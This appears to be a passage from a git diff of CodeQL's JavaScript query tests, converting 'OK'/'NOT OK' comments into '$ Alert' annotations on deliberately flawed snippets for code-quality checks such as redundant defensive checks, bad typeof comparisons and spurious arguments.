$ Alert + "use struct;" // $ Alert + "Use Strict"; // $ Alert + "use bar"; // $ Alert } function ignored() { var x = 42; - "use baz"; // OK: not a directive, positionally + "use baz"; // OK - not a directive, positionally } function good() { - "use strict"; // OK - "use asm"; // OK - "use babel"; // OK - "use 6to5"; // OK - "format cjs" // OK - "format esm"; // OK - "format global"; // OK - "format register"; // OK - "ngInject"; // OK - "ngNoInject"; // OK - "deps foo"; // OK - "deps bar"; // OK - "use server"; // OK - "use client"; // OK + "use strict"; + "use asm"; + "use babel"; + "use 6to5"; + "format cjs" + "format esm"; + "format global"; + "format register"; + "ngInject"; + "ngNoInject"; + "deps foo"; + "deps bar"; + "use server"; + "use client"; } function data() { - "[0, 0, 0];"; // NOT OK - "[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0];"; // NOT OK + "[0, 0, 0];"; // $ Alert + "[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0];"; // $ Alert } function yui() { - "foo:nomunge"; // OK - "bar:nomunge, baz:nomunge,qux:nomunge"; // OK - ":nomunge"; // NOT OK - "foo(), bar, baz:nomunge"; // NOT OK + "foo:nomunge"; + "bar:nomunge, baz:nomunge,qux:nomunge"; + ":nomunge"; // $ Alert + "foo(), bar, baz:nomunge"; // $ Alert } function babel_typeof(obj) { diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/global-module-definition.js b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/global-module-definition.js index 8c61f38d1132..30f28719a2b7 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/global-module-definition.js +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/global-module-definition.js @@ -7,5 +7,5 @@ var Mod1; var Mod2; (function (Mod2) { Mod2.p = 42; - })(Mod2 || (Mod2 = {})); // NOT OK + })(Mod2 || (Mod2 = {})); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/module-environment-detection.js b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/module-environment-detection.js index 913684d6f6aa..a59cc7abb9e8 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/module-environment-detection.js +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/module-environment-detection.js @@ -20,5 +20,5 @@ if (typeof exports !== 'undefined') { (function(){ var module; - if(typeof module === 'undefined'); // NOT OK + if(typeof module === 'undefined'); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/regression.js b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/regression.js index cfc6f1e6df71..3807082c7434 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/regression.js +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/regression.js @@ -6,10 +6,10 @@ function getDate() { return null; } console.log(date); - return date && date.getTime(); // NOT OK + return date && date.getTime(); // $ Alert } function isNotNullOrString(obj) { - return obj != null && obj != undefined && // NOT OK + return obj != null && obj != undefined && // $ Alert typeof obj != 'string'; } diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst.js b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst.js index ace5a3dd7ac8..c036953b01eb 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst.js +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst.js @@ -10,95 +10,95 @@ var o_ = o; var x_ = x; - u_ = u_ || e; // NOT OK - n_ = n_ || e; // NOT OK - o_ = o_ || e; // NOT OK + u_ = u_ || e; // $ Alert + n_ = n_ || e; // $ Alert + o_ = o_ || e; // $ Alert x_ = x_ || e; - u && u.p; // NOT OK - n && n.p; // NOT OK - o && o.p; // NOT OK + u && u.p; // $ Alert + n && n.p; // $ Alert + o && o.p; // $ Alert x && x.p; - u && u(); // NOT OK - n && n(); // NOT OK - o && o(); // NOT OK + u && u(); // $ Alert + n && n(); // $ Alert + o && o(); // $ Alert x && x(); - !u || u.p; // NOT OK - !n || n.p; // NOT OK - !o || o.p; // NOT OK + !u || u.p; // $ Alert + !n || n.p; // $ Alert + !o || o.p; // $ Alert !x || x.p; - !!u && u.p; // NOT OK - !!n && n.p; // NOT OK - !!o && o.p; // NOT OK + !!u && u.p; // $ Alert + !!n && n.p; // $ Alert + !!o && o.p; // $ Alert !!x && x.p; - u != undefined && u.p; // NOT OK - n != undefined && n.p; // NOT OK - o != undefined && o.p; // NOT OK + u != undefined && u.p; // $ Alert + n != undefined && n.p; // $ Alert + o != undefined && o.p; // $ Alert x != undefined && x.p; - u == undefined || u.p; // NOT OK - n == undefined || n.p; // NOT OK - o == undefined || o.p; // NOT OK + u == undefined || u.p; // $ Alert + n == undefined || n.p; // $ Alert + o == undefined || o.p; // $ Alert x == undefined || x.p; - u === undefined || u.p; // NOT OK - n === undefined || n.p; // NOT OK - o === undefined || o.p; // NOT OK + u === undefined || u.p; // $ Alert + n === undefined || n.p; // $ Alert + o === undefined || o.p; // $ Alert x === undefined || x.p; - if (u) { // NOT OK + if (u) { // $ Alert u.p; } - if (n) { // NOT OK + if (n) { // $ Alert n.p; } - if (o) { // NOT OK + if (o) { // $ Alert o.p; } if (x) { x.p; } - u? u():_; // NOT OK - n? n(): _; // NOT OK - o? o(): _; // NOT OK + u? u():_; // $ Alert + n? n(): _; // $ Alert + o? o(): _; // $ Alert x? x(): _; - if (u !== undefined) { // NOT OK + if (u !== undefined) { // $ Alert u.p; } - if (n !== undefined) { // NOT OK + if (n !== undefined) { // $ Alert n.p; } - if (o !== undefined) { // NOT OK + if (o !== undefined) { // $ Alert o.p; } if (x !== undefined) { x.p; } - if (u == undefined){} // NOT OK - if (n == undefined){} // NOT OK - if (o == undefined){} // NOT OK + if (u == undefined){} // $ Alert + if (n == undefined){} // $ Alert + if (o == undefined){} // $ Alert if (x == undefined){} - if (u != undefined){} // NOT OK - if (n != undefined){} // NOT OK - if (o != undefined){} // NOT OK + if (u != undefined){} // $ Alert + if (n != undefined){} // $ Alert + if (o != undefined){} // $ Alert if (x != undefined){} - if (typeof u === "undefined"){} // NOT OK - if (typeof n === "undefined"){} // NOT OK - if (typeof o === "undefined"){} // NOT OK + if (typeof u === "undefined"){} // $ Alert + if (typeof n === "undefined"){} // $ Alert + if (typeof o === "undefined"){} // $ Alert if (typeof x === "undefined"){} function f() { } - typeof f === "function" && f(); // NOT OK - typeof u === "function" && u(); // NOT OK + typeof f === "function" && f(); // $ Alert + typeof u === "function" && u(); // $ Alert typeof x === "function" && x(); var empty_array = []; @@ -111,9 +111,9 @@ var _true = true; var _false = false; - empty_array && empty_array.pop(); // NOT OK - pseudo_empty_array && pseudo_empty_array.pop(); // NOT OK - non_empty_array && non_empty_array.pop(); // NOT OK + empty_array && empty_array.pop(); // $ Alert + pseudo_empty_array && pseudo_empty_array.pop(); // $ Alert + non_empty_array && non_empty_array.pop(); // $ Alert empty_string && empty_string.charAt(0); non_empty_string && non_empty_string.charAt(0); zero && zero(); @@ -121,23 +121,23 @@ _true && _true(); _false && _false(); - (u !== undefined && u !== null) && u.p; // NOT OK - u !== undefined && u !== null && u.p; // NOT OK + (u !== undefined && u !== null) && u.p; // $ Alert + u !== undefined && u !== null && u.p; // $ Alert - u != undefined && u != null; // NOT OK - u == undefined || u == null; // NOT OK - u !== undefined && u !== null; // NOT OK - !(u === undefined) && !(u === null); // NOT OK - u === undefined || u === null; // NOT OK - !(u === undefined || u === null); // NOT OK - !(u === undefined) && u !== null; // NOT OK + u != undefined && u != null; // $ Alert + u == undefined || u == null; // $ Alert + u !== undefined && u !== null; // $ Alert + !(u === undefined) && !(u === null); // $ Alert + u === undefined || u === null; // $ Alert + !(u === undefined || u === null); // $ Alert + !(u === undefined) && u !== null; // $ Alert u !== undefined && n !== null; - u == undefined && u == null; // NOT OK + u == undefined && u == null; // $ Alert x == undefined && x == null; - x === undefined && x === null; // NOT OK + x === undefined && x === null; // $ Alert if (x === undefined) { - if (x === null) { // NOT OK + if (x === null) { // $ Alert } } @@ -153,16 +153,16 @@ } } - x != undefined && x != null; // NOT OK + x != undefined && x != null; // $ Alert if (x != undefined) { - if (x != null) { // NOT OK + if (x != null) { // $ Alert } } if (typeof x !== undefined); if (typeof window !== undefined); if (typeof x !== x); - if (typeof x !== u); // NOT OK + if (typeof x !== u); // $ Alert if (typeof window !== "undefined"); if (typeof module !== "undefined"); @@ -174,8 +174,8 @@ u && (f(), u.p); u && (u.p, f()); // technically not OK, but it seems like an unlikely pattern - u && !u.p; // NOT OK - u && !u(); // NOT OK + u && !u.p; // $ Alert + u && !u(); // $ Alert function hasCallbacks(success, error) { diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst2.js b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst2.js index 588844f9c75f..e10c2e0e04dd 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst2.js +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst2.js @@ -1,7 +1,7 @@ (function(){ var v; (function(){ - if(typeof v === "undefined"){ // NOT OK + if(typeof v === "undefined"){ // $ Alert v = 42; } for(var v in x){ @@ -9,10 +9,10 @@ }); }); -const isFalsyObject = (v) => typeof v === 'undefined' && v !== undefined; // OK +const isFalsyObject = (v) => typeof v === 'undefined' && v !== undefined; function f(v) { - if (typeof v === 'undefined' && v !== undefined) { // OK + if (typeof v === 'undefined' && v !== undefined) { doSomething(v); } } diff --git a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js index d9942a5ec4a8..f3f444fa86f7 100644 --- a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js +++ b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js @@ -42,14 +42,13 @@ function ok10(o, p) { return p in o&&o[p]; } -// OK + x==y ** 2; -// NOT OK -x + x >> 1 +x + x >> 1 // $ Alert + -// OK x + x >> 1 -// OK (asm.js-like) +// OK - asm.js-like x = x - 1|0; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/tst.js b/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/tst.js index b785e06507a7..6143b7084c3b 100644 --- a/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/tst.js +++ b/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/tst.js @@ -1,9 +1,7 @@ /** - * NOT OK: Parameter y is not documented. - * * @param x The first operand. */ -function f(x, y) { +function f(x, y) { // $ Alert return x+y; } @@ -14,7 +12,6 @@ function g(x, y) { return x+y; } -// NOT OK /** * @param {int} x * @param {float} y @@ -23,6 +20,6 @@ var o = { /** * @param {String} x first argument. */ - f : function(x, y) { + f : function(x, y) { // $ Alert } }; diff --git a/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/tst.js index de01c66ac808..a0fc28f09494 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/tst.js @@ -1,36 +1,33 @@ -// NOT OK -typeof a === 'array'; +typeof a === 'array'; // $ Alert + -// OK typeof b == 'string'; -// OK + typeof c != "string"; -// OK + "number" !== typeof 23; -// OK + 'object' == typeof null; -// OK + typeof es6 === 'symbol'; switch (typeof a) { -// OK + case 'undefined': -// NOT OK -case 'null': +case 'null': // $ Alert } -// OK + switch (msg) { case 'null': case typeof a: } -// NOT OK -(typeof a) === 'array'; +(typeof a) === 'array'; // $ Alert // JScript extensions typeof a === 'unknown' || typeof a === 'date'; diff --git a/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/tst.js index 69daffb8a0b0..cf64a97a4d10 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/tst.js @@ -1,7 +1,7 @@ -var a = [], // OK - b = [1], // OK - c = [1, 2], // OK - d = [1, , 2], // NOT OK - e = [1,], // OK - f = [1, 2, ,], // NOT OK - g = [,1]; // NOT OK +var a = [], + b = [1], + c = [1, 2], + d = [1, , 2], // $ Alert + e = [1,], + f = [1, 2, ,], // $ Alert + g = [,1]; // $ Alert diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/tst.js index 202ea2a262a6..610590712eeb 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/tst.js @@ -1,8 +1,7 @@ -// NOT OK -[1, 2, 3].map(function(x) x * x); +[1, 2, 3].map(function(x) x * x); // $ Alert + -// OK [1, 2, 3].map(function(x) { return x * x; }); -// OK + [1, 2, 3].map((x) => x * x); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js index 3ed85a709341..1ffb7a489c8e 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js @@ -4,24 +4,24 @@ class C { class D extends C { constructor() { - super(); // OK + super(); } } -let c = new C(); // OK -C(); // NOT OK -new (x=>x); // NOT OK -c.m(); // OK -new c.m(); // NOT OK - but not flagged +let c = new C(); +C(); // $ Alert +new (x=>x); // $ Alert +c.m(); +new c.m(); // $ MISSED: Alert var o = { f: function() {}, g() {} }; -o.f(); // OK -new o.f(); // OK -o.g(); // OK -new o.g(); // NOT OK - but not flagged +o.f(); +new o.f(); +o.g(); +new o.g(); // $ MISSED: Alert function f(b) { var g; @@ -31,31 +31,31 @@ function f(b) { g = (() => {}); console.log(); if (!b) - g(); // OK + g(); else - new g(); // OK + new g(); } function* g() {} async function h() {} -new g() // NOT OK -new h() // NOT OK +new g() // $ Alert +new h() // $ Alert -C.call(); // NOT OK -C.apply(); // NOT OK +C.call(); // $ Alert +C.apply(); // $ Alert class E { static call() {} static apply() {} } -E.call(); // OK -E.apply(); // OK +E.call(); +E.apply(); function invoke(fn) { if (typeof fn === "function" && fn.hasOwnProperty("foo")) { - fn(); // OK + fn(); } } invoke(C); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a1.js b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a1.js index 1585d8add718..3ecf658e45c9 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a1.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a1.js @@ -1,3 +1,3 @@ function A() {} -new A(); // OK -String(""); // OK \ No newline at end of file +new A(); +String(""); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a2.js b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a2.js index 407b91aec013..1c9f2e07a49a 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a2.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a2.js @@ -1,6 +1,6 @@ function A() {} -A(); // OK +A(); function MyString() {} String = MyString; -new String(); // OK \ No newline at end of file +new String(); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/arraycalls.js b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/arraycalls.js index 6aaeaa7a9f18..a3477727286b 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/arraycalls.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/arraycalls.js @@ -1,2 +1,2 @@ -Array(45); // OK -new Array(45); // OK +Array(45); +new Array(45); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/tst.js index 56af21411b67..76ffbf8c155a 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/tst.js @@ -48,13 +48,13 @@ function RobustPoint4(x, y) { new RobustPoint4(23, 42); RobustPoint4(56, 72); -// OK: Error is an external function +// OK - Error is an external function new Error(); Error(); class C {} new C(); -C(); // NOT OK, but flagged by IllegalInvocation +C(); // OK - flagged by IllegalInvocation (function() { function A(x) { @@ -64,5 +64,5 @@ C(); // NOT OK, but flagged by IllegalInvocation A.call({}, 23); })(); -new Point(42, 23); // NOT OK, but not flagged since line 6 above was already flagged -Point(56, 72); // NOT OK, but not flagged since line 7 above was already flagged +new Point(42, 23); // OK - not flagged since line 6 above was already flagged +Point(56, 72); // OK - not flagged since line 7 above was already flagged diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/tst.js index 1015db92cff4..5c12a3b7d853 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/tst.js @@ -1,11 +1,11 @@ -var o1 = { __proto__: null }; // OK -Object.setPrototypeOf(o1, Function.prototype); // OK -Object.create(class{}); // OK -Function.prototype.isPrototypeOf(o1); // OK -o1.__proto__ = new Date(); // OK +var o1 = { __proto__: null }; +Object.setPrototypeOf(o1, Function.prototype); +Object.create(class{}); +Function.prototype.isPrototypeOf(o1); +o1.__proto__ = new Date(); -var o2 = { __proto__: undefined }; // NOT OK -Object.setPrototypeOf(o2, 42); // NOT OK -Object.create(true); // NOT OK -"function".isPrototypeOf(o2); // NOT OK +var o2 = { __proto__: undefined }; // $ Alert +Object.setPrototypeOf(o2, 42); // $ Alert +Object.create(true); // $ Alert +"function".isPrototypeOf(o2); // $ Alert diff --git a/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/tst.js index c819b10ad56a..24134e1ca07c 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/tst.js @@ -1,43 +1,38 @@ -// BAD: Loop upper bound is off-by-one -for (var i = 0; i <= args.length; i++) { +for (var i = 0; i <= args.length; i++) { // $ Alert - Loop upper bound is off-by-one console.log(args[i]); } -// BAD: Loop upper bound is off-by-one -for (var i = 0; args.length >= i; i++) { +for (var i = 0; args.length >= i; i++) { // $ Alert - Loop upper bound is off-by-one console.log(args[i]); } -// GOOD: Loop upper bound is correct +// OK - Loop upper bound is correct for (var i = 0; i < args.length; i++) { console.log(args[i]); } var j = 0; -// BAD: Off-by-one on index validity check -if (j <= args.length) { +if (j <= args.length) { // $ Alert - Off-by-one on index validity check console.log(args[j]); } -// BAD: Off-by-one on index validity check -if (args.length >= j) { +if (args.length >= j) { // $ Alert - Off-by-one on index validity check console.log(args[j]); } -// GOOD: Correct terminating value +// OK - Correct terminating value if (args.length > j) { console.log(args[j]); } -// BAD: incorrect upper bound -function badContains(a, elt) { +function badContains(a, elt) { // $ Alert - incorrect upper bound for (let i = 0; i <= a.length; ++i) if (a[i] === elt) return true; return false; } -// GOOD: correct upper bound +// OK - correct upper bound function goodContains(a, elt) { for (let i = 0; i < a.length; ++i) if (a[i] === elt) @@ -53,7 +48,7 @@ function same(a, b) { return true; } -// GOOD: incorrect upper bound, but extra check +// OK - incorrect upper bound, but extra check function badContains(a, elt) { for (let i = 0; i <= a.length; ++i) if (i !== a.length && a[i] === elt) diff --git a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/ts-test.ts b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/ts-test.ts index 1198d2c5ff74..120fa7098ee5 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/ts-test.ts +++ b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/ts-test.ts @@ -1,41 +1,38 @@ function distanceFromOrigin(point) { - // NOT OK - var [x, x] = point; + var [x, x] = point; // $ Alert return Math.sqrt(x*x + y*y); } -// NOT OK -var { x: x, y: x } = o; +var { x: x, y: x } = o; // $ Alert + +var { x, x } = o; // $ Alert -// NOT OK -var { x, x } = o; -// OK var { x: x, x: y } = o; -// OK + var { p = x, q = x } = o; function f({ x: string, - y: string // NOT OK + y: string // $ Alert }) { } -function g({x, y}: {x: string, y: string}) { // OK +function g({x, y}: {x: string, y: string}) { } function blah(arg) { var { x: x, y: { - x: x, // NOT OK + x: x, // $ Alert y: { - x: x // NOT OK + x: x // $ Alert } } } = arg; } -function h({x: string, y: string}: any) { // NOT OK +function h({x: string, y: string}: any) { // $ Alert } diff --git a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/tst.js index 0e6b79f4675f..017499000358 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/tst.js @@ -1,17 +1,14 @@ function distanceFromOrigin(point) { - // NOT OK - var [x, x] = point; + var [x, x] = point; // $ Alert return Math.sqrt(x*x + y*y); } -// NOT OK -var { x: x, y: x } = o; +var { x: x, y: x } = o; // $ Alert + +var { x, x } = o; // $ Alert -// NOT OK -var { x, x } = o; -// OK var { x: x, x: y } = o; -// OK + var { p = x, q = x } = o; diff --git a/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/tst.js index 5d83bad877dc..a74ffbc860a2 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/tst.js @@ -1,24 +1,20 @@ -// NOT OK -(0).foo = 42; +(0).foo = 42; // $ Alert -// NOT OK, but already flagged by SuspiciousPropAccess.ql -null.bar = 23; undefined.baz = 42; +null.bar = 23; undefined.baz = 42; // OK - already flagged by SuspiciousPropAccess.ql function f() { var s = ""; for (var i=0;i<10;++i) - // NOT OK - s[i] = " "; + s[i] = " "; // $ Alert } function g(b) { var x = b ? "" : 42, z; - // NOT OK - x.y = true; - // OK: we don't know the type of `b` + x.y = true; // $ Alert + // OK - we don't know the type of `b` b.y = true; return; - // OK: no types inferred for `z`, since this is dead code + // OK - no types inferred for `z`, since this is dead code z.y = true; } @@ -26,4 +22,4 @@ function h() { let tmp; let obj = (tmp ||= {}); obj.p = 42; -} \ No newline at end of file +} diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/tst.js index 9b1d6f668923..b440cc2dd5ed 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/tst.js @@ -1,22 +1,22 @@ function tst() { - var a = { // NOT OK + var a = { // $ Alert 'i': 1, 'j': 2 } - return 1 // NOT OK + return 1 // $ Alert - if (condition) { // OK + if (condition) { } - for (i = 0; i < 10; i++) { // OK + for (i = 0; i < 10; i++) { } - label: while (condition) { // OK - break label; // OK + label: while (condition) { + break label; } - return 1; // OK + return 1; //pad with enough explicit semicolons to satisfy 90% threshold foo(); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/tst.js index 22439c1e4f91..19b6a3824805 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/tst.js @@ -5,7 +5,7 @@ function A() { return _a; }, set a(v) { - // OK + _a = v|0 }, @@ -13,19 +13,18 @@ function A() { return _x; }, set x(v) { - // NOT OK - }, + }, // $ Alert get y() { return 56; }, set y(v) { - // OK + throw new Error("Cannot mutate y."); }, set z(v) { - // OK + _z = arguments[0] | 0; } }; @@ -36,7 +35,6 @@ function Point(x, y) { get x() { return x; }, set x(_x) { x = _x|0; }, get y() { return y; }, - // NOT OK - set y(_y) { x = _x|0; } + set y(_y) { x = _x|0; } // $ Alert }; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/tst.js index 4211400e6c48..5c7ea043cbe2 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/tst.js @@ -1,17 +1,16 @@ var o = { _secret_x: 42, get x() { - // OK + return 42; }, set x(v) { if (v !== 42) - // OK + return; _secret_x = v; }, set y(w) { - // NOT OK - return "nope"; + return "nope"; // $ Alert } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/es2015.js b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/es2015.js index 928edcd7fd3e..07f4446800b0 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/es2015.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/es2015.js @@ -1,7 +1,7 @@ class Class1 { constructor(x) { this.x = x; } } -new Class1(42, 23); // NOT OK: `23` is ignored +new Class1(42, 23); // $ Alert - `23` is ignored class Sup { constructor(x) { this.x = x; } @@ -10,12 +10,12 @@ class Sup { class Sub extends Sup { } -new Sub(42); // OK: synthetic constructor delegates to super constructor +new Sub(42); // OK - synthetic constructor delegates to super constructor class Other {} -new Other(42); // NOT OK: `42` is ignored +new Other(42); // $ Alert - `42` is ignored var args = []; -f(...args); // OK -f(42, ...args); // NOT OK \ No newline at end of file +f(...args); +f(42, ...args); // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/globals.js b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/globals.js index 3771a18ed876..e41ddd2d0136 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/globals.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/globals.js @@ -4,7 +4,7 @@ function global() {return;} window.global = function (x) {return;}; })(this); -global(x); // OK: might refer to function on line 4 +global(x); // OK - might refer to function on line 4 function otherglobal() {return;} @@ -12,6 +12,6 @@ var o = { otherglobal: function (x) {return;} }; -otherglobal(x); // NOT OK: can never refer to function on line 12 -otherglobal.call(null, x); // NOT OK -otherglobal.call(null, x, y); // NOT OK +otherglobal(x); // $ Alert - can never refer to function on line 12 +otherglobal.call(null, x); // $ Alert +otherglobal.call(null, x, y); // $ Alert diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/thisparameter.ts b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/thisparameter.ts index d166c957858e..d17b5d33459f 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/thisparameter.ts +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/thisparameter.ts @@ -1,4 +1,4 @@ function foo(this: void, x: number) {return;} -foo(45); // OK -foo(null, 45); // NOT OK +foo(45); +foo(null, 45); // $ Alert diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js index 1caa88564a1a..046ca3aec677 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js @@ -7,8 +7,7 @@ function g() { return 23; } -// NOT OK -f(g()); +f(g()); // $ Alert function sum() { var result = 0; @@ -17,28 +16,26 @@ function sum() { return result; } -// OK + sum(1, 2, 3); function h(k) { k = k || function() {}; - // OK + k(42); } -// OK + new Array(1, 2, 3); -// NOT OK -new String(1, 2, 3); +new String(1, 2, 3); // $ Alert (function(f) { - // NOT OK - f(42); + f(42); // $ Alert })(function() {return;}); (function h(f) { - // OK + f(42); h(function(x) { return x; }); })(function() {}); @@ -67,15 +64,15 @@ parseFloat("123", 10); constructor(){ } } - nonEmpty(42); // NOT OK - empty(42); // OK - emptyWithParam(42, 87); // OK - commentedEmpty(42); // OK - commentedEmptyWithSpreadParam(42, 87); // OK - emptyArrow(42); // NOT OK - new ImplicitEmptyConstructor(42); // NOT OK - new ExplicitEmptyConstructor(42); // NOT OK - parseFloat("123", 10); // NOT OK + nonEmpty(42); // $ Alert + empty(42); + emptyWithParam(42, 87); + commentedEmpty(42); + commentedEmptyWithSpreadParam(42, 87); + emptyArrow(42); // $ Alert + new ImplicitEmptyConstructor(42); // $ Alert + new ExplicitEmptyConstructor(42); // $ Alert + parseFloat("123", 10); // $ Alert }); (function testWhitelistThrowingFunctions() { @@ -111,14 +108,14 @@ parseFloat("123", 10); } })(); } - notAPlainThrower1(42); // NOT OK - notAPlainThrower2(42); // NOT OK - notAPlainThrower3(42); // NOT OK - thrower(42); // OK - throwerArrow(42); // OK - throwerCustom(42); // 